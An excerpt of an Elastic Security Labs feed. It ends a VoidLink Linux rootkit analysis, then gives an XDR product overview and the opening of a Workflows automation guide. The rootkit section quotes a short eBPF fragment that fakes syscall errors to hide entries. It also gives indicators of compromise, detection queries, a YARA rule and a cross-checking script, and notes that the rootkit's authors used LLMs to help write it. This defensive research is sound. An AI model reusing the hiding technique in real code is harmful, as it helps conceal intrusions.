<p>The <code>ebpf_test/</code> directory provides perhaps the most vivid evidence. It contains <code>hide_ss.bpf.c</code> through <code>hide_ss_v9.bpf.c</code>, with matching <code>loader.c</code> through <code>loader_v9.c</code>. Each version makes incremental improvements over the last, and several contain commented-out &quot;approach&quot; annotations that read like chain-of-thought reasoning:</p>
<pre><code class="language-c">// Approach tried: don't modify return value, only record
// Approach 2: return -ENOMEM to make caller skip
if (data-&gt;should_hide &amp;&amp; regs-&gt;ax == 0) {
    // Try: return -EAGAIN, make caller think temporary error, skip entry
    regs-&gt;ax = (unsigned long)(-EAGAIN);
}
</code></pre>
<p>These &quot;Approach 1 / Approach 2 / try this&quot; annotations look like LLM reasoning traces left in the output, where the model discusses different strategies before implementing one.</p>
<p>Despite the strong LLM fingerprints, VoidLink is clearly not a pure LLM creation. Several pieces of evidence confirm human involvement in the development process. The <code>icmp_ctl.py</code> usage examples contain real Alibaba Cloud IP addresses (<code>8.149.128[.]10</code>, <code>116.62.172[.]147</code>), indicating operational use on actual targets. Compiled <code>.ko</code> files are available for specific kernel versions, demonstrating that the code was tested on real systems. The <code>load_lkm.sh</code> boot script, with its <code>memfd</code> scanning logic, reveals integration with a broader attack toolkit that a pure LLM session wouldn’t produce. And the 10 iterative eBPF versions in <code>ebpf_test/</code> show genuine debugging and testing cycles, not just prompt engineering.</p>
<p>These code-level observations align with Check Point's macro-level findings. Where Check Point recovered the sprint planning documents and TRAE IDE artifacts showing a specification-driven development workflow, our data dump reveals the other side of the same coin: the iterative prompt-test-refine cycles that produced each rootkit component. The most likely development model was a human-LLM collaboration: The operator defined requirements and tested on real systems, while the LLM generated initial implementations and iterated on fixes in response to error reports. This development pattern is significant because it lowers the barrier to entry for kernel-level rootkit development. An operator who understands the concepts but lacks the kernel programming expertise to implement them from scratch can now produce functional, multigeneration rootkits by iterating with an LLM.</p>
<h2>Detecting VoidLink’s rootkits</h2>
<p>Despite VoidLink's multilayered evasion capabilities, several detection strategies are available. The rootkit's thoroughness creates opportunities: Each component, the LKM, the eBPF program, the ICMP channel, and the boot loader, leaves distinct artifacts that defenders can monitor. Because the rootkit actively filters files such as <code>/proc/kallsyms</code>, <code>/proc/modules</code>, and <code>/sys/kernel/debug/kprobes/list</code>, some of the detection strategies below should be validated in a trusted environment, such as a live boot medium or a kernel with verified integrity.</p>
<h3>Module integrity detection</h3>
<p>VoidLink removes itself from the kernel's module linked list (<code>list_del_init</code>), making it invisible to <code>lsmod</code> and <code>/proc/modules</code>. However, the module's sysfs entries under <code>/sys/module/</code> may persist, depending on the variant. Comparing the output of <code>lsmod</code> against <code>ls /sys/module/</code> can reveal discrepancies. Additionally, the absence of <code>amd_mem_encrypt</code> on systems without AMD hardware or without SME/SEV support is a strong indicator.</p>
<p>The following Event Query Language (EQL) query detects kernel module loading events using the default installed utilities:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
  (
    process.name == &quot;kmod&quot; and
    process.args == &quot;insmod&quot; and
    process.args like~ &quot;*.ko*&quot;
  ) or
  (
    process.name == &quot;kmod&quot; and
    process.args == &quot;modprobe&quot; and
    not process.args in (&quot;-r&quot;, &quot;--remove&quot;)
   ) or
  (
    process.name == &quot;insmod&quot; and
    process.args like~ &quot;*.ko*&quot;
   ) or
  (
    process.name == &quot;modprobe&quot; and
    not process.args in (&quot;-r&quot;, &quot;--remove&quot;)
  )
)
</code></pre>
<p>The loading of the kernel module is detectable through Auditd Manager by applying the following configuration:</p>
<pre><code class="language-sql">-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules
-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules
</code></pre>
<p>And using the following query:</p>
<pre><code class="language-sql">driver where host.os.type == &quot;linux&quot; 
and event.action == &quot;loaded-kernel-module&quot; 
and auditd.data.syscall in (&quot;init_module&quot;, &quot;finit_module&quot;)
</code></pre>
<h3>Ftrace hook detection</h3>
<p>VoidLink's ftrace hooks can be discovered by inspecting the kernel's tracing infrastructure. The file <code>/sys/kernel/debug/tracing/enabled_functions</code> lists all active ftrace hooks. Unexpected hooks on functions like <code>__x64_sys_getdents64</code>, <code>vfs_read</code>, <code>do_send_sig_info</code>, or <code>__x64_sys_statx</code> are highly suspicious. Note that VoidLink's <code>vfs_read</code> hook filters this file, so inspection from a trusted kernel is recommended.</p>
<h3>eBPF program detection</h3>
<p>The eBPF companion can be detected through <code>bpftool prog list</code>, which enumerates all loaded BPF programs. Kprobe and kretprobe programs attached to <code>__sys_recvmsg</code> are unusual in production environments and warrant investigation. Pinned BPF maps under <code>/sys/fs/bpf/</code> (used by the <code>ebpf_hide</code> variant) are another indicator.</p>
<p>The <code>bpf_probe_write_user</code> helper facilitates direct writes from kernel-space eBPF programs into userland memory. Although designed for debugging, rootkits can exploit this functionality. Consequently, monitoring for instances of this helper's use presents a detection opportunity. This detection requires the collection of raw syslog data and the implementation of specific detection rules, as outlined below:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and
message:&quot;bpf_probe_write_user&quot;
</code></pre>
<h3>Behavioral cross-referencing</h3>
<p>One of the most effective detection strategies doesn’t rely on inspecting the rootkit's artifacts directly but instead cross-references different views of the system for inconsistencies. Compare the output of <code>ps aux</code> against a raw listing of <code>/proc/</code> directory entries. Compare <code>netstat -tlnp</code> against <code>ss -tlnp</code> against a direct read of <code>/proc/net/tcp</code>. If VoidLink's eBPF component isn’t loaded (or if the LKM and eBPF hide lists are out of sync), connections visible in one view but not another indicate rootkit activity.</p>
<p>A simple (generated) comparison script can automate this:</p>
<pre><code class="language-shell">#!/bin/bash
# Behavioral cross-referencing: detect hidden processes and network connections
# by comparing multiple views of the same system state.

set -euo pipefail

echo &quot;=== Process cross-reference ===&quot;
ps_count=$(ps aux --no-header | wc -l)
proc_count=$(ls -d /proc/[0-9]* 2&gt;/dev/null | wc -l)
echo &quot;ps reports $ps_count processes, /proc has $proc_count entries&quot;

if [ &quot;$ps_count&quot; -ne &quot;$proc_count&quot; ]; then
    echo &quot;[!] MISMATCH — possible hidden or spoofed processes&quot;
    ps aux --no-header | awk '{print $2}' | sort -n &gt; /tmp/.ps_pids
    ls -d /proc/[0-9]* 2&gt;/dev/null | xargs -n1 basename | sort -n &gt; /tmp/.proc_pids
    diff /tmp/.ps_pids /tmp/.proc_pids || true
    rm -f /tmp/.ps_pids /tmp/.proc_pids
else
    echo &quot;[OK] Process counts match&quot;
fi

echo &quot;&quot;
echo &quot;=== Network cross-reference ===&quot;

# Method 1: ss (iproute2 — always available on modern Linux)
# -t = TCP, -l = listening, -n = numeric, no -p (needs root)
ss_port_nums=$(ss -tln | awk 'NR&gt;1{print $4}' | grep -oP '\d+$' | sort -un)

# Method 2: Parse /proc/net/tcp directly (kernel-level view)
# Filter for state 0A (LISTEN), extract hex port, convert via shell printf
proc_ports=$(
    awk 'NR&gt;1 &amp;&amp; $4 == &quot;0A&quot; {split($2, a, &quot;:&quot;); print a[2]}' \
        /proc/net/tcp /proc/net/tcp6 2&gt;/dev/null \
    | while read -r hex; do printf &quot;%d\n&quot; &quot;0x$hex&quot;; done \
    | sort -un
)

echo &quot;ss listening ports      : $(echo &quot;$ss_port_nums&quot; | tr '\n' ' ')&quot;
echo &quot;/proc/net/tcp listening : $(echo &quot;$proc_ports&quot; | tr '\n' ' ')&quot;

diff_result=$(diff &lt;(echo &quot;$ss_port_nums&quot;) &lt;(echo &quot;$proc_ports&quot;) || true)
if [ -z &quot;$diff_result&quot; ]; then
    echo &quot;[OK] Network views match&quot;
else
    echo &quot;[!] MISMATCH — possible hidden connections:&quot;
    echo &quot;$diff_result&quot;
fi
</code></pre>
<h3>YARA signature</h3>
<p>Based on our analysis, we developed the following YARA signature to detect VoidLink's compiled kernel modules and related artifacts:</p>
<pre><code>rule Linux_Rootkit_VoidLink {
    meta:
        author = &quot;Elastic Security&quot;
        creation_date = &quot;2026-03-12&quot;
        last_modified = &quot;2026-03-12&quot;
        os = &quot;Linux&quot;
        arch = &quot;x86_64&quot;
        threat_name = &quot;Linux.Rootkit.VoidLink&quot;
        description = &quot;Detects VoidLink LKM rootkit variants&quot;

    strings:
        $mod1 = &quot;AMD Memory Encryption Support&quot;
        $mod2 = &quot;AMD Memory Encryption Driver&quot;
        $mod3 = &quot;Advanced Micro Devices, Inc.&quot;
        $func1 = &quot;vl_stealth&quot;
        $func2 = &quot;g_data&quot;
        $func3 = &quot;icmp_cmd&quot;
        $func4 = &quot;chk_pid&quot;
        $func5 = &quot;chk_port&quot;
        $func6 = &quot;mod_hide&quot;
        $func7 = &quot;amd_mem_encrypt&quot;
        $ebpf1 = &quot;hidden_ports&quot;
        $ebpf2 = &quot;recvmsg_ctx&quot;
        $ebpf3 = &quot;SOCK_DIAG_BY_FAMILY&quot;

    condition:
        (2 of ($mod*) and 3 of ($func*)) or
        (1 of ($mod*) and 2 of ($ebpf*)) or
        (4 of ($func*))
}
</code></pre>
<h3>Defensive recommendations</h3>
<p>Defending against rootkits like VoidLink requires a multilayered approach that goes beyond traditional endpoint protection. Secure Boot and kernel module signing should be enforced to prevent unauthorized kernel modules from loading. The kernel lockdown mode, available since Linux 5.4, restricts operations such as direct memory access and unsigned module loading, even for root users. Monitor the Auditd subsystem for <code>init_module</code> and <code>finit_module</code> syscalls, as any unexpected kernel module load on a production server warrants immediate investigation.</p>
<p>For eBPF specifically, consider restricting the <code>bpf()</code> syscall to specific processes using seccomp profiles or LSM policies. The <code>bpf_probe_write_user</code> helper, which VoidLink abuses to modify userspace memory from eBPF programs, is a known high-risk primitive. Systems that don’t require eBPF-based debugging should consider disabling it entirely through sysctl (<code>kernel.unprivileged_bpf_disabled=1</code>).</p>
<p>Regular integrity checks that cross-reference different system views (process listings, network connections, module lists) from userspace and from a trusted kernel can reveal rootkit activity even when individual views are compromised. Kernel memory forensics tools that can scan for known rootkit patterns, such as ftrace hooks on suspicious functions or Netfilter hooks processing ICMP traffic, provide another layer of defense.</p>
<h2>Observations</h2>
<p>The following observables were identified during this research.</p>
<table>
<thead>
<tr>
<th align="left">Observable</th>
<th align="left">Type</th>
<th align="left">Name</th>
<th align="left">Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>8.149.128[.]10</code></td>
<td align="left">ipv4-addr</td>
<td align="left"></td>
<td align="left">Operator IP (Alibaba Cloud)</td>
</tr>
<tr>
<td align="left"><code>116.62.172[.]147</code></td>
<td align="left">ipv4-addr</td>
<td align="left"></td>
<td align="left">Operator IP (Alibaba Cloud)</td>
</tr>
<tr>
<td align="left"><code>vl_stealth.ko</code></td>
<td align="left">filename</td>
<td align="left"><code>vl_stealth</code></td>
<td align="left">Production LKM rootkit module</td>
</tr>
<tr>
<td align="left"><code>amd_mem_encrypt.ko</code></td>
<td align="left">filename</td>
<td align="left"><code>amd_mem_encrypt</code></td>
<td align="left">Masqueraded LKM rootkit module</td>
</tr>
<tr>
<td align="left"><code>hide_ss.bpf.o</code></td>
<td align="left">filename</td>
<td align="left"><code>hide_ss</code></td>
<td align="left">eBPF ss-hiding component</td>
</tr>
<tr>
<td align="left"><code>ss_loader</code></td>
<td align="left">filename</td>
<td align="left"><code>ss_loader</code></td>
<td align="left">eBPF loader binary</td>
</tr>
<tr>
<td align="left"><code>icmp_ctl.py</code></td>
<td align="left">filename</td>
<td align="left"><code>icmp_ctl</code></td>
<td align="left">ICMP C2 control script</td>
</tr>
<tr>
<td align="left"><code>load_lkm.sh</code></td>
<td align="left">filename</td>
<td align="left"><code>load_lkm</code></td>
<td align="left">Boot-time persistence loader</td>
</tr>
<tr>
<td align="left"><code>/root/kernel5x_new/vl_stealth.ko</code></td>
<td align="left">filepath</td>
<td align="left"></td>
<td align="left">Hard-coded module path</td>
</tr>
<tr>
<td align="left"><code>/var/log/vl_boot.log</code></td>
<td align="left">filepath</td>
<td align="left"></td>
<td align="left">Boot loader log file</td>
</tr>
<tr>
<td align="left"><code>/sys/fs/bpf/vl_hide_tcp</code></td>
<td align="left">filepath</td>
<td align="left"></td>
<td align="left">Pinned BPF map (override variant)</td>
</tr>
<tr>
<td align="left"><code>0xC0DE</code></td>
<td align="left">icmp-magic</td>
<td align="left"></td>
<td align="left">Default ICMP identification value</td>
</tr>
<tr>
<td align="left"><code>0x42</code></td>
<td align="left">xor-key</td>
<td align="left"></td>
<td align="left">Default XOR encryption key</td>
</tr>
<tr>
<td align="left"><code>AMD Memory Encryption Support</code></td>
<td align="left">string</td>
<td align="left"></td>
<td align="left">Masqueraded MODULE_DESCRIPTION</td>
</tr>
<tr>
<td align="left"><code>Advanced Micro Devices, Inc.</code></td>
<td align="left">string</td>
<td align="left"></td>
<td align="left">Masqueraded MODULE_AUTHOR</td>
</tr>
<tr>
<td align="left"><code>8080</code></td>
<td align="left">network-port</td>
<td align="left"></td>
<td align="left">Default hidden port</td>
</tr>
</tbody>
</table>
<h2>Conclusion</h2>
<p>Check Point Research's publications on VoidLink revealed the scope and ambition of the broader framework: a cloud-native, modular C2 platform with over 30 plugins, adaptive stealth, and multiple transport channels. Our analysis of the leaked rootkit source code complements those findings by providing a deep technical look at the kernel-level subsystem that underpins VoidLink's concealment capabilities. The hybrid LKM-eBPF architecture, spanning four generations of iterative development, demonstrates both technical ambition and practical operational awareness, producing a rootkit capable of comprehensive stealth across multiple kernel versions, from CentOS 7's kernel 3.10 through Ubuntu 22.04's kernel 6.2.</p>
<p>Several aspects of VoidLink stand out as particularly noteworthy. The eBPF Netlink buffer manipulation technique for <code>ss</code> hiding is rarely documented and represents a creative application of <code>bpf_probe_write_user</code> that defenders should be aware of. The delayed initialization strategy evades synchronous module-load security checks, a technique uncommon in the wild and indicative of an understanding of modern EDR behavior. The runtime ICMP credential rotation adds an operational security layer, making network signature-based detection a moving target.</p>
<p>The evidence of LLM-assisted development, both at the project-planning level, documented by Check Point, and at the code-iteration level, visible in our data dump, is perhaps the most significant finding for the threat landscape as a whole. Together, these analyses demonstrate that operators with moderate Linux knowledge can produce kernel-level rootkits by iterating with an AI assistant, lowering a barrier that previously required years of kernel development expertise. As LLMs continue to improve, we expect this pattern to accelerate, making rootkit development accessible to a broader range of threat actors.</p>
<p>We’ll continue to monitor for VoidLink deployments and variants and will update our detection rules as new indicators emerge.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/illuminating-voidlink/illuminating-voidlink.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Investigating from the Endpoint Across Your Environment with Elastic Security XDR]]></title>
            <link>https://www.elastic.co/security-labs/investigating-from-the-endpoint-across-your-environment</link>
            <guid>investigating-from-the-endpoint-across-your-environment</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article highlights how Elastic Security XDR unifies endpoint protection with multi-domain security analytics to help analysts trace and contain multi-stage attacks across hybrid and cloud environments.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Security investigations rarely stay confined to a single host. Today’s attackers increasingly use automation and AI to compress multi-stage attacks into minutes, turning what once unfolded over days into coordinated activity across endpoints, identities, workloads, and cloud services within minutes.</p>
<p>While many attacks begin on an endpoint, investigators must quickly determine how that activity spreads across the environment. In many environments, per-endpoint licensing limits how broadly protection and telemetry can be deployed, creating protection gaps during these investigations.</p>
<p>Elastic Security XDR is built around that reality. It includes best-in-class endpoint protection, without per-endpoint licensing constraints, in an agentic security operations platform where endpoint telemetry, infrastructure signals, and supporting artifacts can be analyzed together.</p>
<p>This post explores how Elastic Security XDR supports investigations across endpoints, workloads, and the broader environment, highlighting tools and workflows that help analysts collect evidence, pivot across telemetry, and respond efficiently.</p>
<h2>Endpoint at the heart of XDR</h2>
<p>The <a href="https://www.elastic.co/resources/security/report/global-threat-report">2025 Elastic Global Threat Report</a> reveals that with 90% of malware targeting Windows, and browsers acting as the 'primary battleground', host-level visibility is essential to stopping a breach before it scales to the cloud. Elastic Defend, Elastic Security’s native endpoint protection, powers XDR from the endpoint outward. It not only prevents threats across Windows, macOS, and Linux, but also generates rich, investigation-grade telemetry that gives analysts the context they need to understand what happened on a host.</p>
<p>As activity occurs, Elastic Defend captures system events including process execution, file changes, network connections, and related artifacts. This telemetry forms the foundation for broader investigations, allowing analysts to correlate endpoint behavior with activity across workloads, identities, and other systems.</p>
<p>Multiple detection layers protect against malware, ransomware, fileless techniques, and other malicious behaviors, using both static and behavioral analysis. Independent validation from the <a href="https://www.elastic.co/blog/av-comparatives-business-security-test-2025">AV-Comparatives Business Security Test</a> confirms Elastic’s effectiveness; in the 2025 test cycle, Elastic Security was the only vendor that blocked every tested threat, earning perfect scores in both Real-World Protection and Malware Protection.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image2.png" alt="" /></p>
<p>Elastic also takes a principled approach to openness. Unlike many endpoint security tools that operate as a black box, Elastic publishes detection and prevention logic in an <a href="https://github.com/elastic/protections-artifacts">open repository</a>. This transparency lets analysts understand how protections work, validate them in their own environments, and prioritize high-risk gaps. By empowering users with visibility and insight, Elastic ensures security teams can act with confidence and maximize the value of their investigations.</p>
<h2>Beyond the endpoint: expanding the investigation</h2>
<p>Attacks rarely stay confined to a single host. Credentials may be compromised, workloads modified, or activity spread across cloud services and infrastructure. To fully understand an incident, analysts need to correlate endpoint activity with signals from the broader environment.</p>
<p>Elastic Security XDR enables this by bringing multiple data sources into the same analysis environment through <a href="https://www.elastic.co/integrations/data-integrations?solution=all-solutions&amp;category=security">hundreds of integrations</a> with popular security tools and data sources. Endpoint telemetry,whether collected by Elastic Defend or another EDR platform, can be analyzed alongside cloud activity, identity events, network telemetry, and third-party logs, without forcing organizations into a closed security stack. Elastic provides the <a href="https://www.elastic.co/docs/reference/ecs">common schema</a> and unified detection engine required to normalize disparate signals, allowing analysts to bypass manual data mapping and immediately pivot between sources to follow how activity moves across users, systems, and infrastructure.</p>
<p>Centralized <a href="https://elastic.github.io/detection-rules-explorer/">detection rules</a> operate across the unified dataset in the security platform, complementing <a href="https://github.com/elastic/protections-artifacts">real-time protections</a> that run directly on the endpoint. They enable alerts to reflect correlated activity across multiple domains. Suspicious process activity on a host can be matched with identity events, cloud API calls, or network behavior, helping analysts determine whether an event is isolated or part of a larger attack chain.</p>
<p>Container workloads highlight another way XDR extends investigations. <a href="https://www.elastic.co/security-labs/getting-started-with-defend-for-containers">Elastic Defend for Containers</a> monitors runtime behavior inside containerized environments, detecting suspicious activity such as unexpected process execution, privilege escalation, or access to sensitive resources. By connecting endpoint behavior to the broader environment, Elastic Security XDR gives analysts the visibility needed to scope incidents accurately, prioritize critical threats, and respond with confidence.</p>
<h2>Reconstructing the attack path</h2>
<p>After relevant telemetry is collected, analysts need to piece together what happened and how the attack progressed. Investigations involve pivoting between events, validating hypotheses, and assembling a complete timeline of activity across the environment.</p>
<p>Elastic Security XDR provides <a href="https://www.elastic.co/docs/solutions/security/investigate">investigation tools</a> designed to support this process. Visual Event Analyzer, Session View, and Timeline allow analysts to explore relationships between events, trace execution chains, and correlate activity across datasets while maintaining investigative context.</p>
<p>Visual Event Analyzer offers a graphical view of process relationships, helping analysts spot suspicious parent-child behavior and understand execution flows. Session View reconstructs activity within a process session, showing commands, network connections, and other actions as they unfolded. Timeline acts as an investigative workspace where analysts collect and correlate events from multiple sources, refine queries, and build a coherent attack narrative.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image5.png" alt="Investigate alerts &amp; processes with Event Analyzer" title="Investigate alerts &amp; processes with Event Analyzer" /></p>
<p>Together, these tools help analysts validate hypotheses faster, deepen analysis, and enable more confident response decisions.</p>
<h2>Agentic investigation: discovery, summarization, and natural language querying</h2>
<p>Elastic Security’s AI-driven investigative workflows help analysts keep pace with modern attacks by accelerating investigation and surfacing connected activity across the environment. Attack Discovery identifies connected alerts across endpoints, workloads, cloud services, and integrated third-party data, helping analysts uncover hidden attack chains without manually correlating events.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image6.png" alt="Attack Discovery detects and summarizes attack activity against the MITRE Attack Chain." title="Attack Discovery detects and summarizes attack activity against the MITRE Attack Chain." /></p>
<p>Once an investigation is underway, Elastic AI Assistant and Agent Builder enable natural-language workflows that let analysts interact with data and automation more efficiently. Analysts can summarize observations, ask questions about entities and activity, and move seamlessly from supporting signals to containment or remediation actions. With the introduction of <a href="https://www.elastic.co/security-labs/agent-skills-elastic-security">agent skills</a>, teams can now extend these workflows with reusable, task-specific capabilities, such as alert triage, rule management, and case handling, allowing the assistant to execute complex, multi-step security tasks with the same consistency and repeatability as traditional automation, but through a conversational interface.</p>
<p>In practice, these capabilities reduce the time from an initial alert to full incident understanding, allowing SOC teams to respond faster, focus on high-priority threats, and act with confidence.</p>
<h2>Built-in forensics and host artifact collection</h2>
<p>During incident response, investigators often need to retrieve additional host artifacts to confirm attacker behavior, identify persistence, or validate user activity.</p>
<p>Elastic Security XDR includes built-in forensic capabilities that allow responders to collect investigative artifacts directly from affected hosts, reducing the need for separate forensic tooling during common investigative tasks. Elastic Defend supports capturing <a href="https://www.elastic.co/docs/solutions/security/endpoint-response-actions#memory-dump">memory snapshots</a> for deeper forensic analysis, while <a href="https://www.elastic.co/docs/solutions/security/investigate/osquery">Osquery Manager</a> enables analysts to run targeted queries to gather and examine host artifacts as part of an investigation.</p>
<p>Forensic visibility is further extended through ongoing collaboration with Osquery. By extending Osquery-based forensics with supplemental tables for common investigative artifacts, Elastic helps uncover evidence such as browser history, AMCache records, and jumplist artifacts. These sources make it easier for analysts to examine user activity and execution history on Windows systems during an investigation. Also available is library of prebuilt forensic queries and packs to extract common investigative artifacts across Windows, macOS, and Linux, including:</p>
<ul>
<li>process listings and execution context</li>
<li>scheduled tasks, startup items, and persistence mechanisms</li>
<li>shell history and command execution artifacts</li>
<li>network configuration and connectivity context</li>
<li>file hashes and other execution-related artifacts</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image3.png" alt="Osquery forensic packs within Elastic Security" title="Osquery forensic packs within Elastic Security" /></p>
<p>These capabilities turn artifact collection into an embedded  step of the investigation, rather than a separate workflow, so teams can confirm what happened all in one platform and act sooner.</p>
<h2>Response actions that keep investigations moving</h2>
<p>Once investigators confirm malicious behavior, the priority shifts to containment and remediation. Elastic Security XDR enables analysts to take immediate action directly from the investigation context, isolating a host, terminating suspicious processes, collecting a file from the endpoint, or running a response script to collect additional evidence needed to complete the analysis.</p>
<p>For organizations using third-party EDRs, Elastic Security XDR can orchestrate containment and response across mixed environments, allowing teams to keep investigation, enforcement, and incident record-keeping anchored in a single platform.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image4.png" alt="Isolating a CrowdStrike-managed host directly from Elastic Security" title="Isolating a CrowdStrike-managed host directly from Elastic Security" /></p>
&lt;div className=&quot;youtube-video-container&quot;&gt;
  &lt;iframe width=&quot;560&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/Spgx80WKaqs?si=3XMt0uFsbNEtpcHv&quot; title=&quot;Isolating a CrowdStrike-managed host directly from Elastic Security&quot; frameBorder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&quot; referrerPolicy=&quot;strict-origin-when-cross-origin&quot; allowFullScreen&gt;&lt;/iframe&gt;
&lt;/div&gt;
<h2>Controlling removable media with Device Control</h2>
<p>Investigations often uncover risk paths beyond traditional malware, such as removable media usage or potential USB-based exfiltration. Elastic Security XDR’s Device Control capabilities let teams manage and enforce removable media policies across endpoints, reducing attack surface and preventing unauthorized data transfer.</p>
<p>Device Control also allows teams to automatically block USB devices and maintain a trusted set of approved devices, ensuring policies are enforced consistently across all endpoints.</p>
<h2>Scaling response with Elastic Workflows</h2>
<p>Incident response often follows repeatable steps. When an alert fires, teams enrich it, gather evidence, contain affected hosts, open cases, notify responders, and document decisions, ensuring investigations persist across handoffs and shift changes.</p>
<p><a href="https://www.elastic.co/search-labs/blog/elastic-workflows-automation">Elastic Workflows</a> gives teams a way to encode those steps as a reusable playbook that runs inside the Elastic platform. Workflows are defined declaratively in YAML in Kibana, and can be triggered in multiple ways: when a Kibana alerting rule fires, on a schedule, or manually on demand.</p>
<p>From there, a workflow can execute a sequence of steps that look a lot like what an analyst would do manually:</p>
<ul>
<li>Query Elastic data (including ES|QL), transform results, and branch based on conditions</li>
<li>Create or update a Case, attach supporting context, and keep an auditable record of what was collected and why.</li>
<li>Notify downstream systems (Slack, Jira, PagerDuty, and other services) using connectors you’ve already configured, or call internal/external APIs via HTTP steps.</li>
</ul>
<p>This becomes especially impactful when paired with endpoint response capabilities. When an alert fires, teams can automatically isolate the host and kick off a standardized evidence bundle - capture a memory dump, collect a suspicious file (get-file), and list running processes - so responders have what they need immediately.</p>
<p>The net effect is faster execution of the first steps in incident response, while investigations follow consistent playbooks across analysts and shifts. Instead of relying on memory and manual checklists, Workflows helps enforce a repeatable investigation standard and makes it easier to scale response when alert volume spikes.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image1.png" alt="Alert Triage workflow built with Elastic Workflows native automation." title="Alert Triage workflow built with Elastic Workflows native automation." /></p>
<h2>Elastic Security Labs - Research that powers real-world defenses</h2>
<p>Elastic Security is informed by the work of <a href="https://www.elastic.co/security-labs/about">Elastic Security Labs</a>, a team dedicated to studying real adversary behavior and translating those findings into practical detection and investigation guidance. Threat Command tracks emerging techniques, malware activity, and endpoint tradecraft, then turns that research into updates that matter in day-to-day security operations: new and refined detection rules, improvements to prevention logic, and clearer guidance on how to investigate what you’re seeing.</p>
<p>Elastic Security Labs also publishes technical write-ups and analyses to help the broader community understand how threats operate in the wild. For defenders, that research provides useful context behind detections - why a technique matters, what evidence to look for, and how to scope impact once an alert fires.</p>
<h2>Tying it all together</h2>
<p>As a core capability of our agentic security operations platform, Elastic Security XDR unifies traditionally siloed defenses to tackle the speed and complexity of modern threats. An initial host-based signal can quickly spread across endpoints, identities, and cloud services. Agentic workflows and agent skills help analysts investigate and respond at machine speed. Analysts no longer need to stitch together disconnected tools - they can follow attacker activity throughout the environment, combining endpoint prevention with autonomous investigative and response capabilities in a single platform.</p>
<h2>Learn More</h2>
<p>Visit <a href="https://elastic.co/security/xdr">elastic.co/security/xdr</a> to learn more. Try a free <a href="https://cloud.elastic.co/serverless-registration">Elastic Security trial</a>, explore Elastic Defend with our <a href="https://videos.elastic.co/watch/wVJRXJQR5orNBEkjgUbVRq">Getting Started video</a>, or practice with real malware at <a href="https://ohmymalware.com">ohmymalware.com</a>.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/investigating-from-the-endpoint-across-your-environment.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Security Automation with Elastic Workflows: From Alert to Response]]></title>
            <link>https://www.elastic.co/security-labs/security-automation-with-elastic-workflows</link>
            <guid>security-automation-with-elastic-workflows</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A practical guide to building intelligent, automated security playbooks with Elastic Workflows.]]></description>
            <content:encoded><![CDATA[<h2>The daily loop</h2>
<p>An alert fires. You open it. You read through the details. You gather context from the surrounding activity. You check for related signals across your environment. You decide what it means and what to do next. Sometimes you escalate. Sometimes you close it and move on.</p>
<p>You do this dozens of times a day. The steps are almost always the same. The data you need is already in your SIEM. The actions you take are predictable. But the work is still manual.</p>
<p>This is the kind of work that automation should handle. Not because it's hard, but because it's repetitive, and every minute spent on repetitive manual triage is a minute not spent on the alerts that actually need a human.</p>
<p>Elastic Workflows brings that automation into the SIEM itself. No separate tool. No integration to build. Your detection rule fires, and a workflow runs, with direct access to your alerts, cases, and security data.</p>
<p>This blog post walks through building a security playbook with Workflows, step by step. We'll start simple and build up to a workflow that runs when an alert fires, checks threat intel, gathers context, creates cases, notifies the team, and brings in AI when the investigation calls for it.</p>
<p>If you're new to Workflows, the <a href="https://www.elastic.co/search-labs/blog/elastic-workflows-automation">introductory technical deep dive</a> blog and <a href="https://www.youtube.com/watch?v=Tu505Zn1wUc">video</a> cover the core concepts of Workflows. This post focuses on applying these concepts in a security context.</p>
<h2>Quick orientation</h2>
<p>Workflows are YAML definitions that run inside Kibana. You define what should happen, and the platform handles execution. At a high level, a workflow is composed of three main parts: triggers (when it runs), steps (what it does), and data flow (how information moves between steps).</p>
<p><a href="https://www.elastic.co/docs/explore-analyze/workflows/triggers"><strong>Triggers</strong></a> decide when the workflow runs. An alert trigger runs on a detection. A scheduled trigger runs on a cadence. A manual trigger runs on demand. A workflow can have more than one.</p>
<p><a href="https://www.elastic.co/docs/explore-analyze/workflows/steps"><strong>Steps</strong></a> define what the workflow does. They run in order and can use outputs from earlier steps. They can query data in <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/elasticsearch">Elasticsearch</a>, update alerts and cases in <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/kibana">Kibana</a>, and <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/external-systems-apps">call external systems</a> like sending a Slack message or scanning a hash on VirusTotal. They can also apply logic such as conditionals or loops, and use <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/ai-steps">AI</a> for tasks like summarizing text, prompting an LLM, or invoking agents when deeper reasoning is needed.</p>
<p>This is the toolkit. With these primitives, you can build workflows that take a signal, gather context, and drive a response.</p>
<h2>Building a security playbook</h2>
